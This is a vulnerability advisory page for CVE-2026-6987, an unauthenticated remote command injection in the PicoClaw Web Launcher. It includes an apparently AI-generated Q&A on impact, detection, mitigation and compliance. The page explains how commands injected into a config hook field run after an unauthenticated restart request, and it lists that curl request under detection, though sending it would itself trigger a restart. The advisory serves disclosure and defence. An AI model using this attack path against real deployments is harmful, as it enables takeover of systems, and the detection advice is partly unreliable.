CVE-2026-6987
Remote Command Injection in PicoClaw Web Launcher Management Plane
Publication date: 2026-04-25
Last updated on: 2026-05-01
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| sipeed | picoclaw | to 0.2.4 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
The CVE-2026-6987 vulnerability in PicoClaw version 0.2.4 is an unauthenticated remote code execution (RCE) issue through the Web Launcher management plane.
Specifically, unauthenticated users can modify the config.json file by injecting arbitrary commands into the hooks.processes[*].command field.
After injecting commands, an unauthenticated POST request to /api/gateway/restart restarts the gateway, causing the injected commands to execute immediately as process hooks.
This happens especially when PicoClaw is started with the -public flag or deployed with an accessible management plane in the same CIDR segment, and when allowed_cidrs is empty or includes the attacker's IP.
The vulnerability arises due to lack of authentication and insufficient input validation, allowing remote attackers to execute arbitrary commands.
How can this vulnerability impact me? :
This vulnerability allows an attacker to remotely execute arbitrary commands on the affected system without authentication.
Such remote code execution can lead to full system compromise, unauthorized access to sensitive data, disruption of services, and potential use of the system as a foothold for further attacks.
Because the attacker can restart the gateway to trigger the malicious commands, the impact is immediate and can be exploited remotely.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if the PicoClaw management interface is accessible without authentication, especially if it is started with the -public flag or deployed within an accessible CIDR segment.
You can look for unauthenticated POST requests to the /api/gateway/restart endpoint, which triggers the command injection.
Additionally, inspecting the config.json file for suspicious or arbitrary commands in the hooks.processes[*].command field can indicate exploitation.
- Use curl or similar tools to test access: curl -X POST http://<target-ip>/api/gateway/restart
- Check the config.json file for injected commands, for example: grep -r 'hooks.processes' /path/to/config.json
- Scan network for open management interfaces on the PicoClaw device, especially those accessible without authentication.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include enforcing mandatory identity authentication on the PicoClaw management interface to prevent unauthenticated access.
Implement strict validation of input paths and parameters for commands specified in the hooks configuration to prevent unauthorized command injection.
Avoid starting the PicoClaw launcher with the -public flag or ensure that the allowed_cidrs configuration does not include untrusted IP addresses.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows unauthenticated remote code execution via the management interface, which can lead to unauthorized access and control over the affected system.
Such unauthorized access and potential data manipulation or exposure could negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require strict controls over data confidentiality, integrity, and access.
Specifically, failure to enforce authentication and input validation as described in the vulnerability could result in breaches of personal or sensitive data, violating regulatory requirements for protecting such information.